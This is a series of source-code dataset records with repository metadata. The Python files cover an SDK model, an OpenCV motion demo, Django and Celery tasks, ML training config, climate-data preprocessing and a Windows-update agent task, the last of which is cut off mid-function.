        self._prop_dict["priority"] = val

    @property
    def created_date_time(self):
        """
        Gets and sets the createdDateTime

        Returns:
            datetime:
                The createdDateTime
        """
        # NOTE(review): "%Y-%m-%dT%H:%M:%S.%f" requires fractional
        # seconds to be present in the wire value — confirm the service
        # always emits them.
        if "createdDateTime" in self._prop_dict:
            return datetime.strptime(self._prop_dict["createdDateTime"].replace("Z", ""), "%Y-%m-%dT%H:%M:%S.%f")
        else:
            return None

    @created_date_time.setter
    def created_date_time(self, val):
        self._prop_dict["createdDateTime"] = val.isoformat()+"Z"

    @property
    def last_modified_date_time(self):
        """
        Gets and sets the lastModifiedDateTime

        Returns:
            datetime:
                The lastModifiedDateTime
        """
        if "lastModifiedDateTime" in self._prop_dict:
            return datetime.strptime(self._prop_dict["lastModifiedDateTime"].replace("Z", ""), "%Y-%m-%dT%H:%M:%S.%f")
        else:
            return None

    @last_modified_date_time.setter
    def last_modified_date_time(self, val):
        self._prop_dict["lastModifiedDateTime"] = val.isoformat()+"Z"

    @property
    def version(self):
        """
        Gets and sets the version

        Returns:
            int:
                The version
        """
        if "version" in self._prop_dict:
            return self._prop_dict["version"]
        else:
            return None

    @version.setter
    def version(self, val):
        self._prop_dict["version"] = val

    @property
    def assignments(self):
        """Gets and sets the assignments

        Returns:
            :class:`AssignmentsCollectionPage<onedrivesdk.request.assignments_collection.AssignmentsCollectionPage>`:
                The assignments
        """
        # NOTE(review): AssignmentsCollectionPage is never imported in this
        # module, so reaching this branch raises NameError — confirm the
        # generator should have emitted the corresponding import.
        if "assignments" in self._prop_dict:
            return AssignmentsCollectionPage(self._prop_dict["assignments"])
        else:
            return None
|
[
"mmainer@microsoft.com"
] |
mmainer@microsoft.com
|
e15ab783b8524095dfce9416304b9b29b70fb815
|
f9357dc6ebe6ae1af0b03a9afc5f765706b8d31f
|
/cv2_functions/cv2_minbox.py
|
9614fc7f0d142f6072a8812d1af97c5d594b277c
|
[] |
no_license
|
cilame/any-whim
|
660acd966048655aa36886047fbc232539807881
|
1520accbe1506a133989a6c2be17572e7fb4693e
|
refs/heads/master
| 2023-08-17T05:10:56.348200
| 2023-08-13T16:45:11
| 2023-08-13T16:45:11
| 110,548,292
| 125
| 64
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 913
|
py
|
# Motion-highlighting demo: subtract the background from a live webcam
# feed and draw minimum-area rotated rectangles around moving regions.
import cv2

# MOG2 background subtractor; a higher varThreshold is less sensitive.
s = cv2.createBackgroundSubtractorMOG2(varThreshold=100)
f = cv2.VideoCapture(0)
while(1):
    a,v = f.read()
    # Foreground mask for the current frame.
    g = s.apply(v)
    # Dilate repeatedly so nearby foreground blobs merge into one contour.
    g = cv2.morphologyEx(g,cv2.MORPH_DILATE,(7,7),iterations=7)
    # NOTE(review): the 3-value return is the OpenCV 3.x API; OpenCV 4.x
    # returns (contours, hierarchy) — confirm the installed version.
    a,b,c = cv2.findContours(g,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE)
    for i in b:
        #print cv2.minAreaRect(i)
        # Four corner points of the rotated bounding box for this contour.
        x1,x2,x3,x4 = cv2.boxPoints(cv2.minAreaRect(i))
        # Skip tiny boxes: both squared side lengths must exceed 20.
        if sum((x1-x2)**2)>20 and sum((x2-x3)**2)>20:
            x1 = tuple(x1)
            x2 = tuple(x2)
            x3 = tuple(x3)
            x4 = tuple(x4)
            # Draw the box edges in green on the original frame.
            cv2.line(v,x1,x2,(0,255,0))
            cv2.line(v,x2,x3,(0,255,0))
            cv2.line(v,x3,x4,(0,255,0))
            cv2.line(v,x4,x1,(0,255,0))
        #if w>10 and h>10:cv2.rectangle(v,(x,y),(x+w,y+h),(0,255,0),1)
    # Show the annotated frame and the mask; the space bar exits.
    cv2.imshow('nier1',v)
    cv2.imshow('nier',g)
    if cv2.waitKey(42)==ord(' '):
        break
f.release()
cv2.destroyAllWindows()
|
[
"opaquism@hotmail.com"
] |
opaquism@hotmail.com
|
b58e705deed2f0b8a2254709321b6101b634b952
|
fcc6fa7905b6045a68b992c74e5301e00d5dd3d3
|
/users/tasks.py
|
bf40dc7db3c53264f1f01878dcefd90681f297b2
|
[] |
no_license
|
alinzel/BookStore
|
cc394c9935155c7fda29aa105edd1e9914bd94aa
|
5dfbf13182ce19dfae4d7f8b443cd8e7a54d1204
|
refs/heads/master
| 2020-03-07T03:22:18.771701
| 2018-03-29T08:00:19
| 2018-03-29T08:00:19
| 127,233,714
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 795
|
py
|
from __future__ import absolute_import,unicode_literals
from celery import shared_task
from django.conf import settings
from django.core.mail import send_mail
# Send the account-activation email.
@shared_task # Shared task: returns a proxy that always uses the task instance bound to current_app.
def send_active_email(token, username, email):
    """Celery task: email the activation link to a newly registered user.

    Args:
        token: activation token embedded in the link URL
        username: display name used in the greeting
        email: recipient address
    """
    subject = '尚硅谷书城用户激活链接' # subject line ("BookStore account activation link")
    message = '你好' + username # plain-text body ("Hello <username>")
    sender = settings.EMAIL_FROM # visible From address
    receiver = [email] # destination mailbox list
    # Activation link. NOTE(review): the host is hard-coded to the dev server.
    html_message = '<a href="http://127.0.0.1:8000/user/active/%s/">http://127.0.0.1:8000/user/active/</a>'%token
    # Send the mail with the HTML link as the rich body.
    send_mail(subject, message, sender,receiver, html_message=html_message)
# TODO Command to start the celery worker:
# celery -A bookstore worker -l info
|
[
"944951481@qq.com"
] |
944951481@qq.com
|
230d26e5c2b5c4bc19665857dfe972ec6b36874b
|
b15d2787a1eeb56dfa700480364337216d2b1eb9
|
/accelbyte_py_sdk/api/platform/models/client_request_parameter.py
|
9f7b1f469cdc712522fbd02313e75c9d9297b6f3
|
[
"MIT"
] |
permissive
|
AccelByte/accelbyte-python-sdk
|
dedf3b8a592beef5fcf86b4245678ee3277f953d
|
539c617c7e6938892fa49f95585b2a45c97a59e0
|
refs/heads/main
| 2023-08-24T14:38:04.370340
| 2023-08-22T01:08:03
| 2023-08-22T01:08:03
| 410,735,805
| 2
| 1
|
MIT
| 2022-08-02T03:54:11
| 2021-09-27T04:00:10
|
Python
|
UTF-8
|
Python
| false
| false
| 6,030
|
py
|
# Copyright (c) 2021 AccelByte Inc. All Rights Reserved.
# This is licensed software from AccelByte Inc, for limitations
# and restrictions contact your company contract manager.
#
# Code generated. DO NOT EDIT!
# template file: ags_py_codegen
# AccelByte Gaming Services Platform Service (4.32.1)
# pylint: disable=duplicate-code
# pylint: disable=line-too-long
# pylint: disable=missing-function-docstring
# pylint: disable=missing-module-docstring
# pylint: disable=too-many-arguments
# pylint: disable=too-many-branches
# pylint: disable=too-many-instance-attributes
# pylint: disable=too-many-lines
# pylint: disable=too-many-locals
# pylint: disable=too-many-public-methods
# pylint: disable=too-many-return-statements
# pylint: disable=too-many-statements
# pylint: disable=unused-import
from __future__ import annotations
from typing import Any, Dict, List, Optional, Tuple, Union
from ....core import Model
class ClientRequestParameter(Model):
    """Client request parameter (ClientRequestParameter).

    Serializable model with four optional fields. A field only appears in
    the serialized output when it has actually been set on the instance
    (or when ``include_empty`` is requested, in which case zero values are
    emitted).

    Properties:
        currency_code: (currencyCode) OPTIONAL str
        language: (language) OPTIONAL str
        price: (price) OPTIONAL float
        region: (region) OPTIONAL str
    """

    # region fields

    currency_code: str  # OPTIONAL
    language: str  # OPTIONAL
    price: float  # OPTIONAL
    region: str  # OPTIONAL

    # endregion fields

    # region with_x methods

    def with_currency_code(self, value: str) -> ClientRequestParameter:
        """Set currency_code; return self for chaining."""
        self.currency_code = value
        return self

    def with_language(self, value: str) -> ClientRequestParameter:
        """Set language; return self for chaining."""
        self.language = value
        return self

    def with_price(self, value: float) -> ClientRequestParameter:
        """Set price; return self for chaining."""
        self.price = value
        return self

    def with_region(self, value: str) -> ClientRequestParameter:
        """Set region; return self for chaining."""
        self.region = value
        return self

    # endregion with_x methods

    # region to methods

    def to_dict(self, include_empty: bool = False) -> dict:
        """Serialize to a wire-format dict with camelCase keys.

        Unset fields are skipped unless ``include_empty`` is True, in
        which case they are emitted as zero values ("" / 0.0).
        """
        result: dict = {}
        if hasattr(self, "currency_code"):
            result["currencyCode"] = str(self.currency_code)
        elif include_empty:
            result["currencyCode"] = ""
        if hasattr(self, "language"):
            result["language"] = str(self.language)
        elif include_empty:
            result["language"] = ""
        if hasattr(self, "price"):
            result["price"] = float(self.price)
        elif include_empty:
            result["price"] = 0.0
        if hasattr(self, "region"):
            result["region"] = str(self.region)
        elif include_empty:
            result["region"] = ""
        return result

    # endregion to methods

    # region static methods

    @classmethod
    def create(
        cls,
        currency_code: Optional[str] = None,
        language: Optional[str] = None,
        price: Optional[float] = None,
        region: Optional[str] = None,
        **kwargs,
    ) -> ClientRequestParameter:
        """Create an instance, setting only the fields passed as non-None."""
        instance = cls()
        if currency_code is not None:
            instance.currency_code = currency_code
        if language is not None:
            instance.language = language
        if price is not None:
            instance.price = price
        if region is not None:
            instance.region = region
        return instance

    @classmethod
    def create_from_dict(
        cls, dict_: dict, include_empty: bool = False
    ) -> ClientRequestParameter:
        """Create an instance from a wire-format dict (camelCase keys).

        Missing or None keys are left unset unless ``include_empty`` is
        True, in which case they are filled with zero values.
        """
        instance = cls()
        if not dict_:
            return instance
        if "currencyCode" in dict_ and dict_["currencyCode"] is not None:
            instance.currency_code = str(dict_["currencyCode"])
        elif include_empty:
            instance.currency_code = ""
        if "language" in dict_ and dict_["language"] is not None:
            instance.language = str(dict_["language"])
        elif include_empty:
            instance.language = ""
        if "price" in dict_ and dict_["price"] is not None:
            instance.price = float(dict_["price"])
        elif include_empty:
            instance.price = 0.0
        if "region" in dict_ and dict_["region"] is not None:
            instance.region = str(dict_["region"])
        elif include_empty:
            instance.region = ""
        return instance

    @classmethod
    def create_many_from_dict(
        cls, dict_: dict, include_empty: bool = False
    ) -> Dict[str, ClientRequestParameter]:
        """Create a mapping of instances from a dict of wire-format dicts.

        BUG FIX: iterate ``dict_.items()`` — iterating a dict directly
        yields keys only, so the original ``for k, v in dict_`` raised a
        ValueError (or silently mis-unpacked 2-character keys) at runtime.
        """
        return (
            {
                k: cls.create_from_dict(v, include_empty=include_empty)
                for k, v in dict_.items()
            }
            if dict_
            else {}
        )

    @classmethod
    def create_many_from_list(
        cls, list_: list, include_empty: bool = False
    ) -> List[ClientRequestParameter]:
        """Create a list of instances from a list of wire-format dicts."""
        return (
            [cls.create_from_dict(i, include_empty=include_empty) for i in list_]
            if list_
            else []
        )

    @classmethod
    def create_from_any(
        cls, any_: Any, include_empty: bool = False, many: bool = False
    ) -> Union[
        ClientRequestParameter,
        List[ClientRequestParameter],
        Dict[Any, ClientRequestParameter],
    ]:
        """Create instance(s) from an arbitrary payload.

        When ``many`` is True the payload must be a dict or a list of
        wire-format dicts; otherwise a single wire-format dict.
        BUG FIX: the parameter annotation used the builtin ``any`` instead
        of ``typing.Any``.

        :raises ValueError: if ``many`` is True and the payload is neither
            a dict nor a list.
        """
        if many:
            if isinstance(any_, dict):
                return cls.create_many_from_dict(any_, include_empty=include_empty)
            elif isinstance(any_, list):
                return cls.create_many_from_list(any_, include_empty=include_empty)
            else:
                raise ValueError()
        else:
            return cls.create_from_dict(any_, include_empty=include_empty)

    @staticmethod
    def get_field_info() -> Dict[str, str]:
        """Map wire-format (camelCase) keys to Python attribute names."""
        return {
            "currencyCode": "currency_code",
            "language": "language",
            "price": "price",
            "region": "region",
        }

    @staticmethod
    def get_required_map() -> Dict[str, bool]:
        """Map wire-format keys to required-ness (every field is optional)."""
        return {
            "currencyCode": False,
            "language": False,
            "price": False,
            "region": False,
        }

    # endregion static methods
|
[
"elmernocon@gmail.com"
] |
elmernocon@gmail.com
|
5a8d87c8871f4b5879836b466e7049fd661da1ea
|
ca23b411c8a046e98f64b81f6cba9e47783d2584
|
/ncsnv3/main.py
|
d7a89ddfc89627cb854f233719729e3382012dce
|
[
"CC-BY-4.0",
"Apache-2.0"
] |
permissive
|
pdybczak/google-research
|
1fb370a6aa4820a42a5d417a1915687a00613f9c
|
0714e9a5a3934d922c0b9dd017943a8e511eb5bc
|
refs/heads/master
| 2023-03-05T23:16:11.246574
| 2021-01-04T11:30:28
| 2021-01-04T11:30:28
| 326,629,357
| 1
| 0
|
Apache-2.0
| 2021-02-01T12:39:09
| 2021-01-04T09:17:36
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 1,580
|
py
|
# coding=utf-8
# Copyright 2020 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Training and evaluation for NCSNv3."""
from . import ncsn_lib
from absl import app
from absl import flags
from ml_collections.config_flags import config_flags
import tensorflow as tf
FLAGS = flags.FLAGS

# Required ml_collections config file describing the whole run; the config
# object is locked so the run cannot mutate it after parsing.
config_flags.DEFINE_config_file(
    "config", None, "Training configuration.", lock_config=True)
flags.DEFINE_string("workdir", None, "Work unit directory.")
flags.DEFINE_string("mode", "train", "Running mode: train or eval")
flags.DEFINE_string("eval_folder", "eval",
                    "The folder name for storing evaluation results")
# Fail fast at startup when the mandatory flags are missing.
flags.mark_flags_as_required(["workdir", "config"])
def main(argv):
    """Entry point: dispatch to training or evaluation based on --mode."""
    del argv  # unused positional args from absl

    # Hide GPUs from TensorFlow — presumably so another framework owns the
    # accelerators while TF only serves data; TODO confirm.
    tf.config.experimental.set_visible_devices([], "GPU")

    mode = FLAGS.mode
    if mode == "train":
        ncsn_lib.train(FLAGS.config, FLAGS.workdir)
        return
    if mode == "eval":
        ncsn_lib.evaluate(FLAGS.config, FLAGS.workdir, FLAGS.eval_folder)
        return
    raise ValueError(f"Mode {FLAGS.mode} not recognized.")


if __name__ == "__main__":
    app.run(main)
|
[
"copybara-worker@google.com"
] |
copybara-worker@google.com
|
20947ccf802631ec01474e52ab2310cf9b617690
|
9743d5fd24822f79c156ad112229e25adb9ed6f6
|
/xai/brain/wordbase/adjectives/_redoubtable.py
|
8645cb26ee8dbbcd8fcdc345eeb5befad16d369c
|
[
"MIT"
] |
permissive
|
cash2one/xai
|
de7adad1758f50dd6786bf0111e71a903f039b64
|
e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6
|
refs/heads/master
| 2021-01-19T12:33:54.964379
| 2017-01-28T02:00:50
| 2017-01-28T02:00:50
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 453
|
py
|
#calss header
class _REDOUBTABLE():
def __init__(self,):
self.name = "REDOUBTABLE"
self.definitions = [u'very strong, especially in character; producing respect and a little fear in others: ']
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.specie = 'adjectives'
def run(self, obj1, obj2):
self.jsondata[obj2] = {}
self.jsondata[obj2]['properties'] = self.name.lower()
return self.jsondata
|
[
"xingwang1991@gmail.com"
] |
xingwang1991@gmail.com
|
3f96d8878c3bb4206095f84b4f67f59194a2984b
|
4af65b44b39816c7037ff928da1ae153f4d970e5
|
/mud/thing.py
|
37a9732599722b87d944c6e390898be6dba87f1c
|
[] |
no_license
|
Cloudxtreme/mud-14
|
0745eda694ffeee79120fcfc82aab2da8b7a9655
|
f02d4ca0e8360b0924b86a3da99e5230c3028642
|
refs/heads/master
| 2021-05-28T06:14:37.121028
| 2014-12-01T08:00:27
| 2014-12-01T08:00:27
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 132
|
py
|
import mudclasses as mc
import event as evt
import english
from types import TupleType
# bug: permanence (sp?) is not yet handled
|
[
"leif.theden@gmail.com"
] |
leif.theden@gmail.com
|
8ee2d7c7cfec8a059e6c4f84dfb4a253e1464a52
|
89a90707983bdd1ae253f7c59cd4b7543c9eda7e
|
/python_cookbook/10/monkeypatching_modules_on_import1.py
|
89edccaa9b169b1d124990a2c3e05dd183a7d93b
|
[] |
no_license
|
timothyshull/python_reference_code
|
692a7c29608cadfd46a6cc409a000023e95b9458
|
f3e2205dd070fd3210316f5f470d371950945028
|
refs/heads/master
| 2021-01-22T20:44:07.018811
| 2017-03-17T19:17:22
| 2017-03-17T19:17:22
| 85,346,735
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 165
|
py
|
from postimport import when_imported
@when_imported('threading')
def warn_threads(mod):
    """Post-import hook: runs once, the first time 'threading' is imported.

    mod: the freshly imported module object, supplied by the hook machinery.
    """
    print('Threads? Are you crazy?')


if __name__ == '__main__':
    # Nothing to demo directly; the hook fires only on an actual import.
    pass
|
[
"timothyshull@gmail.com"
] |
timothyshull@gmail.com
|
8fb6bfee4530acca0b7936e56a0c29ede098296b
|
2be5b2a6f5172b37fde90b076504fa9fe4f93784
|
/nosmsd/management/commands/nosmsd_incoming.py
|
a31a1677e93343f07145d84bad79c89cede66b3e
|
[] |
no_license
|
pedrokiefer/nosmsd
|
74b73e959b8482744531caf4f81e7515791a5ff3
|
e69d7f55d54f0f5e85eec16cde6da0cb64d63b5c
|
refs/heads/master
| 2021-01-14T13:17:11.680061
| 2014-11-25T13:34:31
| 2014-11-25T13:34:31
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 518
|
py
|
#!/usr/bin/env python
# encoding=utf-8
# maintainer: rgaudin
import sys
from django.conf import settings
from django.core.management.base import BaseCommand
from django.utils import translation
from nosmsd.nosmsd_incoming import handle as nohandle
class Command(BaseCommand):
    """Django management command that forwards incoming-SMS handling to
    nosmsd, with the project's default locale active for the duration."""

    def handle(self, *args, **options):
        translation.activate(settings.DEFAULT_LOCALE)
        # Prepend an argv[0]-style token so nohandle sees the same calling
        # convention as when it is invoked directly from the command line.
        args = (u"%s %s" % (sys.argv[0], u"nosmsd_incoming"),) + args
        nohandle(*args, DJANGO=True)
        translation.deactivate()
|
[
"rgaudin@gmail.com"
] |
rgaudin@gmail.com
|
28ef3309ea1c0af7d7c199ff4dfdcf9e68caf048
|
4254c7f88b95c7aec20979691aecf63053c97570
|
/cfdm/core/bounds.py
|
b3d70390051fcf096b1fe5d9ae2ad1b2f42f5528
|
[
"MIT"
] |
permissive
|
cofinoa/cfdm
|
2a1fc2069ef253c6eb4a71a4d1fa252295d9be1d
|
1e074dbc28054780a9ec667d61b9098b94956ea6
|
refs/heads/master
| 2020-05-07T08:39:24.996138
| 2019-04-08T14:34:56
| 2019-04-08T14:34:56
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,016
|
py
|
from builtins import super
from . import abstract
class Bounds(abstract.PropertiesData):
    '''A cell bounds component of a coordinate or domain ancillary
    construct of the CF data model.

    An array of cell bounds spans the same domain axes as its coordinate
    array, with the addition of an extra dimension whose size is that of
    the number of vertices of each cell. This extra dimension does not
    correspond to a domain axis construct since it does not relate to an
    independent axis of the domain. Note that, for climatological time
    axes, the bounds are interpreted in a special way indicated by the
    cell method constructs.

    .. versionadded:: 1.7.0

    '''

    def __init__(self, properties=None, data=None, source=None,
                 copy=True, _use_data=True):
        '''**Initialization**

        :Parameters:

            properties: `dict`, optional
                Set descriptive properties. The dictionary keys are property
                names, with corresponding values. Ignored if the *source*
                parameter is set.

                *Parameter example:*
                   ``properties={'standard_name': 'altitude'}``

                Properties may also be set after initialisation with the
                `set_properties` and `set_property` methods.

            data: `Data`, optional
                Set the data. Ignored if the *source* parameter is set.

                The data also may be set after initialisation with the
                `set_data` method.

            source: optional
                Override the *properties* and *data* parameters with
                ``source.properties()`` and ``source.get_data(None)``
                respectively.

                If *source* does not have one of these methods, then the
                corresponding parameter is not set.

            copy: `bool`, optional
                If False then do not deep copy input parameters prior to
                initialization. By default arguments are deep copied.

        '''
        # All property/data handling is delegated to PropertiesData; this
        # subclass adds no state of its own.
        super().__init__(properties=properties, data=data,
                         source=source, copy=copy)
    #--- End: def

#--- End: class
|
[
"d.c.hassell@reading.ac.uk"
] |
d.c.hassell@reading.ac.uk
|
aaf0fcdaee70b39287fea8239def89eee1d419c9
|
ba54b70f93fe7f9d114623d76b1ad3f88309d66f
|
/uvideo/forms.py
|
99e3e96d880007e37a2d6a8887d3860983e0d765
|
[] |
no_license
|
loobinsk/newprj
|
9769b2f26092ce7dd8612fce37adebb307b01b8b
|
c6aa6a46973fb46375f4b05a86fe76207a8ae16d
|
refs/heads/master
| 2023-05-07T00:28:44.242163
| 2021-05-25T08:22:05
| 2021-05-25T08:22:05
| 370,617,690
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 619
|
py
|
#-*- coding: utf-8 -*-
from django import forms
from uvideo.models import UserVideo
from django.template import loader, Context
from gutils.forms import BootstrapFormMixin
class UploadVideoWidget(forms.HiddenInput):
    """Hidden input rendered inside the video-upload template, which wraps
    the raw <input> with the upload UI."""

    def render(self, name, value, attrs=None):
        tmpl = loader.get_template('uvideo/video-upload-input.html')
        # NOTE(review): the caller's `attrs` argument is discarded — the
        # super call hard-codes attrs=None. Confirm this is intentional.
        return tmpl.render(Context({
            'input': super(UploadVideoWidget, self).render(name, value, attrs=None),
            'id': name,
        }))
class UserVideoForm(BootstrapFormMixin, forms.ModelForm):
    """ModelForm exposing only the source URL of a UserVideo."""

    class Meta:
        model = UserVideo
        fields = ['url']
|
[
"root@bazavashdom.ru"
] |
root@bazavashdom.ru
|
736e9e1a22663053a31a445dbb2ce7cecb2841c3
|
232fc2c14942d3e7e28877b502841e6f88696c1a
|
/ding/interaction/config/base.py
|
446e260203ff8119d34f20748b6d29698b85da7d
|
[
"Apache-2.0"
] |
permissive
|
shengxuesun/DI-engine
|
ebf84221b115b38b4b3fdf3079c66fe81d42d0f7
|
eb483fa6e46602d58c8e7d2ca1e566adca28e703
|
refs/heads/main
| 2023-06-14T23:27:06.606334
| 2021-07-12T12:36:18
| 2021-07-12T12:36:18
| 385,454,483
| 1
| 0
|
Apache-2.0
| 2021-07-13T02:56:27
| 2021-07-13T02:56:27
| null |
UTF-8
|
Python
| false
| false
| 432
|
py
|
# System configs
GLOBAL_HOST = '0.0.0.0'   # bind on all interfaces
LOCAL_HOST = '127.0.0.1'  # loopback only

# General request
DEFAULT_REQUEST_RETRIES = 5          # max retry attempts per request
DEFAULT_REQUEST_RETRY_WAITING = 1.0  # wait between retries (presumably seconds)

# Slave configs
MIN_HEARTBEAT_SPAN = 0.2      # lower bound on heartbeat interval
DEFAULT_HEARTBEAT_SPAN = 3.0  # default heartbeat interval
DEFAULT_SLAVE_PORT = 7236

# Master configs
MIN_HEARTBEAT_CHECK_SPAN = 0.1      # lower bound on heartbeat-check interval
DEFAULT_HEARTBEAT_CHECK_SPAN = 1.0  # default heartbeat-check interval
DEFAULT_HEARTBEAT_TOLERANCE = 17.0  # silence tolerated before a peer is considered lost — TODO confirm
DEFAULT_MASTER_PORT = 7235

# Two-side configs
DEFAULT_CHANNEL = 0
|
[
"niuyazhe@sensetime.com"
] |
niuyazhe@sensetime.com
|
b2e4985b6430b407be3fe3d835729ebeb8aa2e69
|
facb8b9155a569b09ba66aefc22564a5bf9cd319
|
/wp2/era5_scripts/02_preprocessing/combine82/502-tideGauge.py
|
658865e7aebe194e5247d2a059242aa96349e091
|
[] |
no_license
|
moinabyssinia/modeling-global-storm-surges
|
13e69faa8f45a1244a964c5de4e2a5a6c95b2128
|
6e385b2a5f0867df8ceabd155e17ba876779c1bd
|
refs/heads/master
| 2023-06-09T00:40:39.319465
| 2021-06-25T21:00:44
| 2021-06-25T21:00:44
| 229,080,191
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,117
|
py
|
# -*- coding: utf-8 -*-
"""
Created on Tue Apr 16 16:11:00 2020
--------------------------------------------
Load predictors for each TG and combine them
--------------------------------------------
@author: Michael Tadesse
"""
import os
import pandas as pd
#define directories
dir_in = '/lustre/fs0/home/mtadesse/eraFiveConcat'
dir_out = '/lustre/fs0/home/mtadesse/ereaFiveCombine'
def combine(start=502, end=503):
    """Combine per-predictor CSVs (slp, wnd_u, wnd_v) into one CSV per
    tide gauge.

    For each tide-gauge folder at index ``start`` .. ``end``-1 of the
    ``os.listdir`` order of ``dir_in``, read the three predictor files,
    prefix their data columns with the predictor name, merge them on the
    shared 'date' column, and write '<tg_name>.csv' into ``dir_out``.

    Generalized from the original hard-coded ``x = 502; y = 503`` — the
    defaults preserve the original behavior exactly.
    """
    os.chdir(dir_in)
    # Folder names, one per tide gauge.
    tg_list_name = os.listdir()

    for t in range(start, end):
        tg_name = tg_list_name[t]
        print(tg_name, '\n')

        # Work inside this tide gauge's folder (relative to dir_in).
        os.chdir(tg_name)
        where = os.getcwd()
        csv_path = {
            'slp': os.path.join(where, 'slp.csv'),
            'wnd_u': os.path.join(where, 'wnd_u.csv'),
            'wnd_v': os.path.join(where, 'wnd_v.csv'),
        }

        pred_combined = None
        for pr in csv_path.keys():
            print(tg_name, ' ', pr)
            # Read the predictor table.
            pred = pd.read_csv(csv_path[pr])
            # Drop index columns left over from earlier to_csv round-trips.
            pred.drop(['Unnamed: 0', 'Unnamed: 0.1'], axis=1, inplace=True)
            # Prefix each data column with the predictor name; keep 'date'.
            pred.columns = [
                col if col == 'date' else pr + str(col) for col in pred.columns
            ]
            # Accumulate by merging on the shared 'date' column.
            if pred_combined is None:
                pred_combined = pred
            else:
                pred_combined = pd.merge(pred_combined, pred, on='date')

        # Save the combined table, then return to the input root so the
        # next relative chdir works.
        os.chdir(dir_out)
        pred_combined.to_csv('.'.join([tg_name, 'csv']))
        os.chdir(dir_in)
        print('\n')


# run script
combine()
|
[
"michaelg.tadesse@gmail.com"
] |
michaelg.tadesse@gmail.com
|
5590c83b21209475b9f2d74cbf0f4aa8bc06fdf7
|
88023c9a62994e91291c67088156a2894cc26e9e
|
/corral/exceptions.py
|
6b957a785fc63342e2236f36930ddf95e737b7a0
|
[
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
toros-astro/corral
|
41e9d0224d734c4268bf5161d472b3c0375842f0
|
75474b38ff366330d33644461a902d07374a5bbc
|
refs/heads/master
| 2023-06-10T15:56:12.264725
| 2018-09-03T17:59:41
| 2018-09-03T17:59:41
| 44,282,921
| 6
| 5
|
BSD-3-Clause
| 2023-03-24T12:03:17
| 2015-10-14T23:56:40
|
Python
|
UTF-8
|
Python
| false
| false
| 1,745
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (c) 2016-2017, Cabral, Juan; Sanchez, Bruno & Berois, Martín
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
class ValidationError(Exception):
    """Raised when a validation step fails."""
    pass


class ImproperlyConfigured(ValueError):
    """Raised when configuration values are invalid or missing."""
    pass


class DBError(Exception):
    """Raised for database-related failures."""
    pass
|
[
"jbc.develop@gmail.com"
] |
jbc.develop@gmail.com
|
3314310b124324421bdc948e97abc2584f9cc2e0
|
30268e3918f8dc079a757e985fee374605c931b2
|
/api/tacticalrmm/winupdate/tasks.py
|
487b171e5b0bfbde2f2bdf9fc3fb94be0d93781c
|
[
"MIT"
] |
permissive
|
doytsujin/tacticalrmm
|
e1be7ad7950bb95c4b37dd63ac03eb323115d866
|
7fb79e0bcce62dbb892fb36665ff6d7135d7bebf
|
refs/heads/master
| 2021-03-21T14:02:24.858487
| 2020-02-24T07:11:15
| 2020-02-24T07:11:15
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,999
|
py
|
from time import sleep
from agents.models import Agent
from .models import WinUpdate
from tacticalrmm.celery import app
@app.task
def check_for_updates_task(pk, wait=False):
    """Celery task: query an agent (via Salt's win_wua module) for its
    Windows updates and sync the results into the WinUpdate table.

    pk: primary key of the Agent to check.
    wait: when True, sleep 60 seconds before querying.
    Returns a short status string.
    """
    if wait:
        sleep(60)

    agent = Agent.objects.get(pk=pk)
    # Ask salt for every update, installed or not (skip_installed=False).
    resp = agent.salt_api_cmd(
        hostname=agent.salt_id,
        timeout=310,
        salt_timeout=300,
        func="win_wua.list",
        arg="skip_installed=False",
    )
    data = resp.json()
    ret = data["return"][0][agent.salt_id]

    # if managed by wsus, nothing we can do until salt supports it
    # (salt returns an error *string* rather than the usual dict)
    if type(ret) is str:
